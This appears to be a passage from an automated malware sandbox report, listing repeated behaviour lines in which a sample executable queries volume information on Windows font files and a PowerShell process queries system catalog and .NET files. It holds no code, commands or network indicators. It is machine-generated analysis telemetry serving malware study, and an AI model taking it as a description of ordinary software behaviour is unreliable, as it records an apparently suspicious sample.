            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
